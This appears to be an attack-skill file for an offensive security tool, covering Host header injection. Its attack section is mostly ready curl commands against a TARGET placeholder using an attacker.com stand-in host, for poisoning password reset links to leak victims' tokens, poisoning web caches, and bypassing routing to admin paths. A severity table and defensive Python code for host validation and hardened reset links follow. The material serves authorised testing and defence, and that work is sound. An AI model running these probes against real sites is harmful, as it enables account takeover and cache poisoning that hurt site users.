attack-host-header
Host header injection — password reset poisoning, cache poisoning, routing bypass, SSRF via Host
Based on the professional SOC classification
| field | value |
|---|---|
| name | attack-host-header |
| description | Host header injection — password reset poisoning, cache poisoning, routing bypass, SSRF via Host |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["host-header","web","injection","attack"] |
| tech_stack | ["web"] |
| cwe_ids | ["CWE-644"] |
| chains_with | ["attack-cache-poison","attack-open-redirect"] |
| prerequisites | [] |
| severity_boost | {"attack-cache-poison":"Host header + cache poisoning = stored attack affecting all users"} |
Exploit web server reliance on the Host header to poison password reset links, web caches, or route requests to internal services.
Password reset poisoning:

```bash
# Trigger a password reset with an injected Host
curl -X POST https://TARGET/forgot-password \
  -H "Host: attacker.com" \
  -d "email=victim@example.com"

# X-Forwarded-Host variant
curl -X POST https://TARGET/forgot-password \
  -H "X-Forwarded-Host: attacker.com" \
  -d "email=victim@example.com"
```

If the reset email link contains attacker.com, the token is leaked when the victim clicks it.

Host header manipulation variants:

```bash
# Two Host headers
curl https://TARGET/ \
  -H "Host: TARGET" \
  -H "Host: attacker.com"

# Host with port injection
curl https://TARGET/ \
  -H "Host: TARGET:@attacker.com"

# Override headers honoured by some proxies and frameworks
curl https://TARGET/ -H "X-Forwarded-Host: attacker.com"
curl https://TARGET/ -H "X-Host: attacker.com"
curl https://TARGET/ -H "X-Forwarded-Server: attacker.com"

# Path override headers (routing bypass)
curl https://TARGET/ -H "X-Original-URL: /admin"
curl https://TARGET/ -H "X-Rewrite-URL: /admin"

# Route to an internal virtual host via Host
# (some servers also give an absolute request-target precedence over the Host header)
curl "https://TARGET/api" \
  -H "Host: internal-admin.TARGET"
```

Cache poisoning check:

```bash
# If the response is cached with the injected host, the cache headers in the
# response (X-Cache, Age) will show it being served from cache
curl -i https://TARGET/ -H "X-Forwarded-Host: attacker.com"
# Subsequent requests from any user will then get the poisoned response
```
| Finding | Severity |
|---|---|
| Password reset link contains injected host | Critical (P1) |
| Cache poisoned with injected host/links | High (P2) |
| Internal routing bypass (access /admin) | High (P2) |
| Host header reflected in page without sanitization | Medium (P3) |
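Defensive counterpart to the probes above, added here as an example rather than code from this skill: a strict host validator that rejects duplicate Host headers, the `TARGET:@attacker.com` port trick and untrusted `X-Forwarded-Host`, next to a vulnerable and a hardened reset-link builder. The allow-list `app.example.com` and the base URL are constructed values.

```python
import re
from typing import List, Tuple

# Strict host[:port] grammar: DNS labels plus an optional numeric port. Values such as
# "target:@attacker.com" (userinfo smuggled in via the port) do not match and are rejected.
_HOST_RE = re.compile(
    r"^(?P<host>[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*)(?::(?P<port>\d{1,5}))?$"
)
ALLOWED_HOSTS = {"app.example.com"}            # constructed: the site's canonical host(s)
CANONICAL_BASE_URL = "https://app.example.com"  # every absolute link we emit starts here

def effective_host(header_items: List[Tuple[str, str]], trusted_proxy: bool = False) -> str:
    """Return the validated request host or raise ValueError.
    header_items is the raw (name, value) list so duplicate Host headers stay visible;
    X-Forwarded-Host is honoured only when the connection came from a trusted proxy."""
    hosts = [v for k, v in header_items if k.lower() == "host"]
    if len(hosts) != 1:
        raise ValueError("expected exactly one Host header, got %d" % len(hosts))
    candidate = hosts[0]
    if trusted_proxy:
        forwarded = [v for k, v in header_items if k.lower() == "x-forwarded-host"]
        if forwarded:
            candidate = forwarded[0].split(",")[0]  # first hop only
    m = _HOST_RE.match(candidate.strip().lower())
    if not m:
        raise ValueError("malformed Host value: %r" % candidate)
    if m.group("host") not in ALLOWED_HOSTS:
        raise ValueError("Host not in allow-list: %r" % m.group("host"))
    return m.group("host")

def host_is_acceptable(header_items, trusted_proxy=False):
    """Boolean form for middleware that logs and rejects instead of raising."""
    try:
        effective_host(header_items, trusted_proxy)
        return True
    except ValueError:
        return False

def reset_link_vulnerable(header_items, token):
    # Vulnerable pattern: whichever host the client supplied (X-Forwarded-Host first,
    # then Host) ends up in the e-mailed link, so the token goes wherever it points.
    hdrs = {k.lower(): v for k, v in header_items}
    host = hdrs.get("x-forwarded-host", hdrs.get("host"))
    return f"https://{host}/reset?token={token}"

def reset_link_hardened(header_items, token):
    # Hardened: the request host is still validated (mismatches can be logged),
    # but the link is built from configuration, never from a request header.
    effective_host(header_items)
    return f"{CANONICAL_BASE_URL}/reset?token={token}"
```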